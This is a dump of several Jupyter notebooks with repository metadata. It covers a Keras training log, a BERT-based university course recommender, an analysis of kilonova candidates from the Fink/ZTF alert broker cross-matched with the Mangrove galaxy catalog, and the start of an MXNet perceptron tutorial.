[==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0788 - val_mae: 0.0788 - val_mse: 0.0111\nEpoch 42/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0835 - mae: 0.0835 - mse: 0.0113 - val_loss: 0.0810 - val_mae: 0.0810 - val_mse: 0.0116\nEpoch 43/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0111 - val_loss: 0.0784 - val_mae: 0.0784 - val_mse: 0.0109\nEpoch 44/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0111 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0109\nEpoch 45/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0110 - val_loss: 0.0781 - val_mae: 0.0781 - val_mse: 0.0109\nEpoch 46/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0829 - mae: 0.0829 - mse: 0.0111 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0110\nEpoch 47/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0112 - val_loss: 0.0841 - val_mae: 0.0841 - val_mse: 0.0120\nEpoch 48/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0112 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0110\nEpoch 49/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0804 - val_mae: 0.0804 - val_mse: 0.0116\nEpoch 50/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0826 - mae: 0.0826 - mse: 0.0111 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0110\nEpoch 51/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0112 - val_loss: 0.0785 - val_mae: 0.0785 - val_mse: 0.0110\nEpoch 52/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0822 - mae: 0.0822 - mse: 0.0110 - val_loss: 0.0799 - val_mae: 0.0799 - val_mse: 0.0114\nEpoch 53/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0110 - val_loss: 0.0780 - val_mae: 0.0780 - val_mse: 0.0109\nEpoch 54/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0829 - mae: 0.0829 - mse: 0.0112 - val_loss: 0.0778 - val_mae: 0.0778 - val_mse: 0.0109\nEpoch 55/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0828 - mae: 0.0828 - mse: 0.0111 - val_loss: 0.0795 - val_mae: 0.0795 - val_mse: 0.0113\nEpoch 56/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 
0.0779 - val_mae: 0.0779 - val_mse: 0.0109\nEpoch 57/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0111 - val_loss: 0.0777 - val_mae: 0.0777 - val_mse: 0.0109\nEpoch 58/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0111 - val_loss: 0.0797 - val_mae: 0.0797 - val_mse: 0.0111\nEpoch 59/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0111 - val_loss: 0.0778 - val_mae: 0.0778 - val_mse: 0.0109\nEpoch 60/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0111 - val_loss: 0.0782 - val_mae: 0.0782 - val_mse: 0.0109\nEpoch 61/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 62/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0800 - val_mae: 0.0800 - val_mse: 0.0115\nEpoch 63/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0832 - mae: 0.0832 - mse: 0.0112 - val_loss: 0.0798 - val_mae: 0.0798 - val_mse: 0.0112\nEpoch 64/80\n68/68 [==============================] - 1s 13ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0786 - val_mae: 0.0786 - val_mse: 0.0110\nEpoch 65/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0827 - mae: 0.0827 - mse: 0.0110 - val_loss: 0.0779 - val_mae: 0.0779 - val_mse: 0.0108\nEpoch 66/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 67/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0110 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0110\nEpoch 68/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0830 - mae: 0.0830 - mse: 0.0113 - val_loss: 0.0792 - val_mae: 0.0792 - val_mse: 0.0111\nEpoch 69/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0798 - val_mae: 0.0798 - val_mse: 0.0114\nEpoch 70/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0780 - val_mae: 0.0780 - val_mse: 0.0109\nEpoch 71/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0819 - mae: 0.0819 - mse: 0.0110 - val_loss: 0.0809 - val_mae: 0.0809 - val_mse: 0.0114\nEpoch 72/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0824 - mae: 0.0824 - mse: 0.0110 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0111\nEpoch 73/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0822 - mae: 0.0822 - mse: 0.0110 - val_loss: 0.0785 - val_mae: 0.0785 - val_mse: 0.0109\nEpoch 74/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0821 - mae: 0.0821 - mse: 0.0110 - val_loss: 0.0787 - val_mae: 0.0787 - val_mse: 0.0109\nEpoch 75/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0825 - mae: 0.0825 - mse: 0.0111 - val_loss: 0.0777 - val_mae: 0.0777 - val_mse: 0.0108\nEpoch 76/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0821 - mae: 0.0821 - mse: 0.0109 - val_loss: 0.0783 - val_mae: 0.0783 - val_mse: 0.0109\nEpoch 77/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0826 - mae: 0.0826 - mse: 0.0111 - val_loss: 0.0802 - val_mae: 0.0802 - val_mse: 0.0115\nEpoch 78/80\n68/68 
[==============================] - 1s 11ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0111 - val_loss: 0.0779 - val_mae: 0.0779 - val_mse: 0.0109\nEpoch 79/80\n68/68 [==============================] - 1s 11ms/step - loss: 0.0823 - mae: 0.0823 - mse: 0.0110 - val_loss: 0.0781 - val_mae: 0.0781 - val_mse: 0.0109\nEpoch 80/80\n68/68 [==============================] - 1s 12ms/step - loss: 0.0822 - mae: 0.0822 - mse: 0.0110 - val_loss: 0.0776 - val_mae: 0.0776 - val_mse: 0.0108\n29/29 [==============================] - 0s 3ms/step - loss: 0.0856 - mae: 0.0856 - mse: 0.0121\n" ], [ "err = plot_me.apply([\n lambda a : abs(a.PredictedTemp1 - a.TrueTemp),\n lambda a : abs(a.PredictedTemp2 - a.TrueTemp),\n lambda a : abs(a.PredictedTemp3 - a.TrueTemp)\n],axis=1).set_axis(['Err1','Err2','Err3'],axis=1)\n#cumulative error comparison.\nerr.rolling(99999,min_periods=1).sum().plot(figsize=(30,10))", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
cb207e201aec0b44973869021f4c31e7220385a8
26,898
ipynb
Jupyter Notebook
Exploration/deep_learning_content_based_exploration.ipynb
beileihe/697-Capstone
00d4f48ad1fd380f55462af56acafaf88a75dfc7
[ "CC0-1.0" ]
null
null
null
Exploration/deep_learning_content_based_exploration.ipynb
beileihe/697-Capstone
00d4f48ad1fd380f55462af56acafaf88a75dfc7
[ "CC0-1.0" ]
null
null
null
Exploration/deep_learning_content_based_exploration.ipynb
beileihe/697-Capstone
00d4f48ad1fd380f55462af56acafaf88a75dfc7
[ "CC0-1.0" ]
null
null
null
37.410292
401
0.463046
[ [ [ "## This notebook:\n- Try deep learning method on content based filtering\n", "_____no_output_____" ], [ "----------------------\n### 1. Read files into dataframe\n\n### 2. concat_prepare(f_df, w_df)\n- Concat f_21, w_21\n\n### 3. store_model(df) - only once for a new dataframe\n- Train a SentenceTransformer model\n- Save embedder, embeddings, and corpus\n\n### 4. Read the stored embedder, embeddings, and corpus\n\n### 5. dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None)\n- input\n - df: dataset\n - embeddings, corpus, embedder: stored embeddings, stored corpus, stored embedder\n - course_title: input course title\n - k: number of recommendation\n - filter_lever, semester, lsa\n- output\n - recommended courses in df", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nimport pickle\nimport sklearn\nimport faiss\nimport spacy\nfrom sentence_transformers import SentenceTransformer\nimport scipy.spatial", "_____no_output_____" ], [ "online = pd.read_csv('assets/original/2021-10-19-MichiganOnline-courses.csv')\nf_21 = pd.read_csv('assets/f_21_merge.csv')\nw_22 = pd.read_csv('assets/w_22_merge.csv')", "_____no_output_____" ], [ "def concat_prepare(f_df, w_df):\n f_df['semester'] = 'fall'\n w_df['semester'] = 'winter'\n \n # Concat\n df = pd.concat([f_df, w_df])\n \n # Clean\n df = df.fillna('').drop_duplicates(subset=['course']).reset_index().drop(columns='index')\n\n # Remove description with no information\n df['description'].replace('(Hybrid, Synchronous)', '', inplace = True)\n \n # Merge all the text data\n df['text'] = df['Subject'] + ' ' \\\n + df['Course Title'] + ' ' \\\n + df['sub_title'] +' '\\\n + df['description']\n \n return df\n\nfw = concat_prepare(f_21, w_22)\n", "_____no_output_____" ], [ "def store_model(df):\n corpus = df['text'].tolist()\n embedder = SentenceTransformer('bert-base-nli-mean-tokens')\n corpus_embeddings = embedder.encode(corpus)\n with open('corpus_embeddings.pkl', \"wb\") as fOut:\n pickle.dump({'corpus': corpus, 'embeddings': corpus_embeddings}, fOut, protocol=pickle.HIGHEST_PROTOCOL)\n with open('embedder.pkl', \"wb\") as fOut:\n pickle.dump(embedder, fOut, protocol=pickle.HIGHEST_PROTOCOL)\n#store_model(fw)", "_____no_output_____" ] ], [ [ "## Bert Sentence Transformer ", "_____no_output_____" ] ], [ [ "%%time\n\n#Load sentences & embeddings from disc\nwith open('corpus_embeddings.pkl', \"rb\") as fIn:\n stored_data = pickle.load(fIn)\n stored_corpus = stored_data['corpus']\n stored_embeddings = stored_data['embeddings']\n \nwith open('embedder.pkl', \"rb\") as fIn:\n stored_embedder = pickle.load(fIn)", "CPU times: user 293 ms, sys: 770 ms, total: 1.06 s\nWall time: 3.09 s\n" ], [ "len(stored_corpus), len(fw['text'].to_list())", "_____no_output_____" ] ], [ [ "## Deep learning content based filtering", "_____no_output_____" ] ], [ [ "def dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None):\n # df: dataset\n # embeddings: stored_embeddings\n # corpus: stored_corpus or df['text'].tolist() -- should be the same\n # embedder: stored_embedder\n # course_title = input course title\n # k = number of recommendation\n # filter_level = 'subject', semester = 'fall', lsa = None\n \n \n # If the len of corpus doesn't match the len of input df text, can't process the rec sys properly. 
\n if len(corpus) != len(df['text']):\n print('Stored corpus and the text of the input dataset are different.')\n return None\n \n else:\n input_ag = df.loc[df['course'] == course_title, 'Acad Group'].unique()\n input_sub = df.loc[df['course'] == course_title, 'Subject'].unique()\n input_course = df.loc[df['course'] == course_title, 'Course Title'].unique()\n input_subtitle = df.loc[df['course'] == course_title, 'sub_title'].unique()\n input_des = df.loc[df['course'] == course_title, 'description'].unique()\n \n query = [' '.join(input_sub + input_course + input_subtitle + input_des)]\n \n if len(query[0]) == 0:\n print('No text information was provided for the recommender system')\n return None\n \n\n d = 768\n index = faiss.IndexFlatL2(d)\n\n index.add(np.stack(embeddings, axis=0))\n\n query_embedding = embedder.encode(query)\n D, I = index.search(query_embedding, k) # actual search\n\n\n distances, indices = index.search(np.asarray(query_embedding).reshape(1,768),k)\n\n #print(\"Query:\", query)\n\n rec_df = df.iloc[indices[0],:]\n \n \n # Filter the df\n \n # Filter df with semester \n if semester in ['fall', 'winter']:\n df = df[df['semester'] == semester]\n else:\n pass\n \n # Filter df with acad_group\n if filter_level == 'academic_group':\n rec_df = rec_df[rec_df['Acad Group'].isin(input_ag)] \n elif filter_level == 'subject':\n rec_df = rec_df[(rec_df['Subject'].isin(input_sub)) | (rec_df['Course Title'].isin(input_course))]\n else:\n pass\n\n req_dis = list(rec_df['requirements_distribution'].unique())\n\n # Filter the df with lsa\n if lsa in req_dis:\n rec_df = rec_df[rec_df['requirements_distribution'] == lsa]\n else:\n # Give error message or no df\n pass\n \n return rec_df[:k]", "_____no_output_____" ], [ "%%time\ndl_content(fw, stored_embeddings, stored_corpus, stored_embedder, 'EECS 587', k = 10, filter_level = None, semester = 'fall', lsa = 'BS')\n", "Query: ['Electrical Engineering And Computer Science (EECS) Open SectionsParallel ComputingThe development of programs for parallel computers. Basic concepts such as speedup, load balancing, latency, system taxonomies. Design of algorithms for idealized models. Programming on parallel systems such as shared or distributed memory machines, networks. Grid computing. 
Performance analysis.']\nCPU times: user 621 ms, sys: 880 ms, total: 1.5 s\nWall time: 2.72 s\n" ], [ "import gensim\nimport gensim.corpora as corpora\nfrom gensim.utils import simple_preprocess\nfrom gensim.models import CoherenceModel\nfrom gensim.models.ldamulticore import LdaMulticore\n\ncourses = fw['course'].unique()\n\ndef calc_topic_coherence(df):\n def gen_words(texts):\n final = []\n for text in texts:\n new = gensim.utils.simple_preprocess(text, deacc=True)\n final.append(new)\n return (final)\n \n texts = gen_words(df['description'])\n \n num_topics = 1\n id2word = corpora.Dictionary(texts)\n corpus = [id2word.doc2bow(text) for text in texts]\n \n try:\n model = LdaMulticore(corpus=corpus,id2word = id2word, num_topics = num_topics, alpha=.1, eta=0.1, random_state = 42)\n #print('Model created')\n coherencemodel = CoherenceModel(model = model, texts = texts, dictionary = id2word, coherence = 'c_v')\n #print(\"Topic coherence: \",coherencemodel.get_coherence())\n coherence_value = coherencemodel.get_coherence()\n except:\n coherence_value = None\n return coherence_value\n\ndef coh(func):\n coh_val = []\n i = 0\n while i <100:\n input_course = np.random.choice(courses, 1)[0]\n rec_df = func(fw, stored_embeddings, stored_corpus, stored_embedder, input_course, k = 10, filter_level = None, semester = '', lsa = '')\n rec_df = rec_df.append(fw[fw['course'] == input_course])\n rec_df['description'] = rec_df['description'].fillna('').astype(str)\n val = calc_topic_coherence(rec_df)\n if val != None:\n coh_val.append(val)\n i+=1\n\n avg_coh_sk = np.average(coh_val)\n return avg_coh_sk", "_____no_output_____" ], [ "%%time\ndl_coh = coh(dl_content)", "CPU times: user 2min 39s, sys: 26.1 s, total: 3min 5s\nWall time: 7min 44s\n" ], [ "dl_coh", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb20908449b871bb1155cbf59f91b1799f1d8f3b
174,121
ipynb
Jupyter Notebook
KN-Mangrove_filter.ipynb
JulienPeloton/fink_grandma_kn
eb1a07a35089a54a43d6bd45a185c1d5cabf60c8
[ "Apache-2.0" ]
null
null
null
KN-Mangrove_filter.ipynb
JulienPeloton/fink_grandma_kn
eb1a07a35089a54a43d6bd45a185c1d5cabf60c8
[ "Apache-2.0" ]
null
null
null
KN-Mangrove_filter.ipynb
JulienPeloton/fink_grandma_kn
eb1a07a35089a54a43d6bd45a185c1d5cabf60c8
[ "Apache-2.0" ]
null
null
null
228.805519
28,284
0.907007
[ [ [ "# GRANDMA/Kilonova-catcher --- KN-Mangrove\n\nThe purpose of this notebook is to inspect the ZTF alerts that were selected by the Fink KN-Mangrove filter as potential Kilonova candidates in the period 2021/04/01 to 2021/08/31, and forwarded to the GRANDMA/Kilonova-catcher project for follow-up observations.\n\nWith the other filter (KN-LC), we need at least two days to identify a candidate. It may seem like a short amount of time, but if the object is a kilonova, it will already be fading or even too faint to be observed. The second filter aims to tackle younger detections. An alert will be considered as a candidate if, on top of the other cuts, one can identify a suitable host and the resulting absolute magnitude is compatible with the kilonovae models.\nTo identify possible hosts, we used the MANGROVE catalog [1]. It is an inventory of 800,000 galaxies. At this point, we are only interested in their position in the sky: right ascension, declination, and luminosity distance. We only considered the galaxies in a 230 Mpc range, as it is the current observation range of the gravitational waves interferometers.\n\nThis filter uses the following cuts:\n- Point-like object: the star/galaxy extractor score must be above 0.4. This could be justified by saying that the alert should be a point-like object. Actually, few objects score below 0.4 given the current implementation, and objects that do are most likely boguses.\n- Non-artefact: the deep real/bogus score must be above 0.5.\n- Object non referenced in SIMBAD catalog (galactic ones).\n- Young detection: less than 6 hours.\n- Galaxy association: The alert should within 10 kpc of a galaxy from the Mangrove catalog.\n- Absolute magnitude: the absolute magnitude of the alert should be −16 ± 1.\n\nAccording to [2], we expect a kilonova event to display an absolute magnitude of −16 ± 1. We don’t know the distance of the alerts in general, so we will compute the absolute magnitude of an alert as if it were in a given galaxy. This threshold is given in the band g but it was implemented and band g and r without distinction. This hypothesis is due to the lack of observations.\n\nThe galaxy association method is also not perfect: it can lead to the mis-association of an event that is in the foreground or the background of a galaxy. But this is necessary as the luminosity distance between the earth and the alert is usually unknown.\n\n\n[1] J-G Ducoin et al. “Optimizing gravitational waves follow-up using galaxies stellar mass”. In: Monthly Notices of the Royal Astronomical Society 492.4 (Jan. 2020), pp. 4768–4779. issn: 1365-2966. doi: 10.1093/mnras/staa114. url: http://dx.doi.org/10.1093/ mnras/staa114.\n\n[2] Mansi M. Kasliwal et al. “Kilonova Luminosity Function Constraints Based on Zwicky Transient Facility Searches for 13 Neutron Star Merger Triggers during O3”. In: The Astrophysical Journal 905.2 (Dec. 2020), p. 145. issn: 1538-4357. doi: 10.3847/1538- 4357/abc335. 
url: http://dx.doi.org/10.3847/1538-4357/abc335.", "_____no_output_____" ] ], [ [ "import os\nimport requests\n\nimport pandas as pd\nimport numpy as np\n\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\n\n# pip install fink_filters\nfrom fink_filters import __file__ as fink_filters_location\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_context('talk')\n\nAPIURL = 'https://fink-portal.org'", "_____no_output_____" ] ], [ [ "## KN-Mangrove data\n\nLet's load the alert data from this filter:", "_____no_output_____" ] ], [ [ "pdf_kn_ma = pd.read_parquet('data/0104_3009_kn_filter2_class.parquet')\n\nnalerts_kn_ma = len(pdf_kn_ma)\nnunique_alerts_kn_ma = len(np.unique(pdf_kn_ma['objectId']))\n\nprint(\n '{} alerts loaded ({} unique objects)'.format(\n nalerts_kn_ma, \n nunique_alerts_kn_ma\n )\n)", "68 alerts loaded (59 unique objects)\n" ] ], [ [ "## Visualising the candidates\n\nFinally, let's inspect one lightcurve:", "_____no_output_____" ] ], [ [ "oid = pdf_kn_ma['objectId'].values[2]\ntns_class = pdf_kn_ma['TNS'].values[2]\nkn_trigger = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[2]\n\nr = requests.post(\n '{}/api/v1/objects'.format(APIURL),\n json={\n 'objectId': oid,\n 'withupperlim': 'True'\n }\n)\n\n# Format output in a DataFrame\npdf = pd.read_json(r.content)\n\nfig = plt.figure(figsize=(15, 6))\n\ncolordic = {1: 'C0', 2: 'C1'}\n\nfor filt in np.unique(pdf['i:fid']):\n maskFilt = pdf['i:fid'] == filt\n\n # The column `d:tag` is used to check data type\n maskValid = pdf['d:tag'] == 'valid'\n plt.errorbar(\n pdf[maskValid & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),\n pdf[maskValid & maskFilt]['i:magpsf'],\n pdf[maskValid & maskFilt]['i:sigmapsf'],\n ls = '', marker='o', color=colordic[filt]\n )\n\n maskUpper = pdf['d:tag'] == 'upperlim'\n plt.plot(\n pdf[maskUpper & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),\n pdf[maskUpper & maskFilt]['i:diffmaglim'],\n ls='', marker='^', color=colordic[filt], markerfacecolor='none'\n )\n\n maskBadquality = pdf['d:tag'] == 'badquality'\n plt.errorbar(\n pdf[maskBadquality & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),\n pdf[maskBadquality & maskFilt]['i:magpsf'],\n pdf[maskBadquality & maskFilt]['i:sigmapsf'],\n ls='', marker='v', color=colordic[filt]\n )\n\nplt.axvline(kn_trigger - 2400000.5, ls='--', color='grey')\nplt.gca().invert_yaxis()\nplt.xlabel('Modified Julian Date')\nplt.ylabel('Magnitude')\nplt.title('{}'.format(oid))\nplt.show()\nprint('{}/{}'.format(APIURL, oid))", "_____no_output_____" ] ], [ [ "Circles (●) with error bars show valid alerts that pass the Fink quality cuts. Upper triangles with errors (▲), representing alert measurements that do not satisfy Fink quality cuts, but are nevetheless contained in the history of valid alerts and used by classifiers. Lower triangles (▽), representing 5-sigma mag limit in difference image based on PSF-fit photometry contained in the history of valid alerts. The vertical line shows the KN trigger by Fink.", "_____no_output_____" ], [ "## Evolution of the classification", "_____no_output_____" ], [ "Each alert was triggered because the Fink pipelines favoured the KN flavor at the time of emission. But the underlying object on the sky might have generated further alerts after, and the classification could evolve. For a handful of alerts, let see what they became. 
For this, we will use the Fink REST API, and query all the data for the underlying object:", "_____no_output_____" ] ], [ [ "NALERTS = 3\noids = pdf_kn_ma['objectId'].values[0: NALERTS]\nkn_triggers = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[0: NALERTS]\n\nfor oid, kn_trigger in zip(oids, kn_triggers):\n r = requests.post(\n '{}/api/v1/objects'.format(APIURL),\n json={\n 'objectId': oid,\n 'output-format': 'json'\n }\n )\n\n # Format output in a DataFrame\n pdf_ = pd.read_json(r.content)\n times, classes = np.transpose(pdf_[['i:jd','v:classification']].values)\n \n fig = plt.figure(figsize=(12, 5))\n \n plt.plot(times, classes, ls='', marker='o')\n plt.axvline(kn_trigger, ls='--', color='C1')\n \n plt.title(oid)\n plt.xlabel('Time (Julian Date)')\n plt.ylabel('Fink inferred classification')\n plt.show()", "_____no_output_____" ], [ "oids", "_____no_output_____" ] ], [ [ "Note that Kilonova classification does not appear here as this label is reserved to the KN-LC filter. We are working on giving a new label. \n\nOne can see that alert classification for a given object can change over time. With time, we collect more data, and have a clearer view on the nature of the object. Let's make an histogram of the final classification for each object (~1min to run)", "_____no_output_____" ] ], [ [ "final_classes = []\noids = np.unique(pdf_kn_ma['objectId'].values)\nfor oid in oids:\n r = requests.post(\n '{}/api/v1/objects'.format(APIURL),\n json={\n 'objectId': oid,\n 'output-format': 'json'\n }\n )\n pdf_ = pd.read_json(r.content)\n if not pdf_.empty:\n final_classes.append(pdf_['v:classification'].values[0])", "_____no_output_____" ], [ "fig = plt.figure(figsize=(12, 5))\n\nplt.hist(final_classes)\n\nplt.xticks(rotation=15.)\nplt.title('Final Fink classification of KN candidates');", "_____no_output_____" ] ], [ [ "Most of the objects are still unknown according to Fink.", "_____no_output_____" ], [ "## Follow-up of candidates by other instruments", "_____no_output_____" ], [ "Some of the alerts benefited from follow-up by other instruments to determine their nature. Usually this information can be found on the TNS server (although this is highly biased towards Supernovae). We attached this information to the alerts (if it exists):", "_____no_output_____" ] ], [ [ "pdf_kn_ma.groupby('TNS').count().sort_values('objectId', ascending=False)['objectId']", "_____no_output_____" ] ], [ [ "We can see that among all 53 alerts forwarded by Fink, 39 have no known counterpart in TNS (i.e. no follow-up result was reported). 
", "_____no_output_____" ], [ "## Retrieving Mangrove data", "_____no_output_____" ] ], [ [ "catalog_path = os.path.join(os.path.dirname(fink_filters_location), 'data/mangrove_filtered.csv')\npdf_mangrove = pd.read_csv(catalog_path)", "_____no_output_____" ], [ "pdf_mangrove.head(2)", "_____no_output_____" ], [ "# ZTF\nra1 = pdf_kn_ma['candidate'].apply(lambda x: x['ra'])\ndec1 = pdf_kn_ma['candidate'].apply(lambda x: x['dec'])\n\n# Mangrove\ncols = ['internal_names', 'ra', 'declination', 'discoverydate', 'type']\nra2, dec2, name, lum_dist, ang_dist = pdf_mangrove['ra'], pdf_mangrove['dec'], pdf_mangrove['2MASS_name'], pdf_mangrove['lum_dist'], pdf_mangrove['ang_dist']\n\n# create catalogs\ncatalog_ztf = SkyCoord(ra=ra1.values*u.degree, dec=dec1.values*u.degree)\ncatalog_tns = SkyCoord(ra=np.array(ra2, dtype=np.float)*u.degree, dec=np.array(dec2, dtype=np.float)*u.degree)\n\n# cross-match\nidx, d2d, d3d = catalog_ztf.match_to_catalog_sky(catalog_tns)\n\npdf_kn_ma['2MASS_name'] = name.values[idx]\n\npdf_kn_ma['separation (Kpc)'] = d2d.radian * ang_dist.values[idx] * 1000\n\npdf_kn_ma['lum_dist (Mpc)'] = lum_dist.values[idx]", "/Users/julien/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:11: DeprecationWarning: `np.float` is a deprecated alias for the builtin `float`. To silence this warning, use `float` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.float64` here.\nDeprecated in NumPy 1.20; for more details and guidance: https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations\n # This is added back by InteractiveShellApp.init_path()\n" ], [ "pdf_kn_ma[['objectId', '2MASS_name', 'separation (Kpc)', 'lum_dist (Mpc)']].head(5)", "_____no_output_____" ], [ "fig = plt.figure(figsize=(12, 6))\n\nplt.hist(pdf_kn_ma['lum_dist (Mpc)'], bins=20)\n\nplt.xlabel('Luminosity distance of matching galaxies (Mpc)');", "_____no_output_____" ], [ "np.max(pdf_kn_ma['lum_dist (Mpc)'])", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb2090c60f5468f38cf147bb51de26ed6c075fea
176,954
ipynb
Jupyter Notebook
slides/2_7/perceptron.ipynb
yang-chenyu104/berkeley-stat-157
327f77db7ecdc02001f8b7be8c1fcaf0607694c0
[ "Apache-2.0" ]
2,709
2018-12-29T18:15:20.000Z
2022-03-31T13:24:29.000Z
slides/2_7/perceptron.ipynb
zemooooo/berkeley-stat-157
82e700596f986191ecde38f5829fb40d50a98ab4
[ "Apache-2.0" ]
7
2018-12-27T04:56:20.000Z
2021-02-18T04:43:11.000Z
slides/2_7/perceptron.ipynb
zemooooo/berkeley-stat-157
82e700596f986191ecde38f5829fb40d50a98ab4
[ "Apache-2.0" ]
1,250
2019-01-07T05:51:39.000Z
2022-03-31T13:24:18.000Z
463.230366
36,652
0.941149
[ [ [ "# The Perceptron", "_____no_output_____" ] ], [ [ "import mxnet as mx\nfrom mxnet import nd, autograd\nimport matplotlib.pyplot as plt\nimport numpy as np\nmx.random.seed(1)", "_____no_output_____" ] ], [ [ "## A Separable Classification Problem", "_____no_output_____" ] ], [ [ "# generate fake data that is linearly separable with a margin epsilon given the data\ndef getfake(samples, dimensions, epsilon):\n wfake = nd.random_normal(shape=(dimensions)) # fake weight vector for separation\n bfake = nd.random_normal(shape=(1)) # fake bias\n wfake = wfake / nd.norm(wfake) # rescale to unit length\n\n # making some linearly separable data, simply by chosing the labels accordingly\n X = nd.zeros(shape=(samples, dimensions))\n Y = nd.zeros(shape=(samples))\n\n i = 0\n while (i < samples):\n tmp = nd.random_normal(shape=(1,dimensions))\n margin = nd.dot(tmp, wfake) + bfake\n if (nd.norm(tmp).asscalar() < 3) & (abs(margin.asscalar()) > epsilon):\n X[i,:] = tmp[0]\n Y[i] = 1 if margin.asscalar() > 0 else -1\n i += 1\n return X, Y", "_____no_output_____" ], [ "# plot the data with colors chosen according to the labels\ndef plotdata(X,Y):\n for (x,y) in zip(X,Y):\n if (y.asscalar() == 1):\n plt.scatter(x[0].asscalar(), x[1].asscalar(), color='r')\n else:\n plt.scatter(x[0].asscalar(), x[1].asscalar(), color='b')\n\n# plot contour plots on a [-3,3] x [-3,3] grid \ndef plotscore(w,d):\n xgrid = np.arange(-3, 3, 0.02)\n ygrid = np.arange(-3, 3, 0.02)\n xx, yy = np.meshgrid(xgrid, ygrid)\n zz = nd.zeros(shape=(xgrid.size, ygrid.size, 2))\n zz[:,:,0] = nd.array(xx)\n zz[:,:,1] = nd.array(yy)\n vv = nd.dot(zz,w) + d\n CS = plt.contour(xgrid,ygrid,vv.asnumpy())\n plt.clabel(CS, inline=1, fontsize=10)", "_____no_output_____" ], [ "X, Y = getfake(50, 2, 0.3)\nplotdata(X,Y)\nplt.show()", "_____no_output_____" ] ], [ [ "## Perceptron Implementation", "_____no_output_____" ] ], [ [ "def perceptron(w,b,x,y):\n 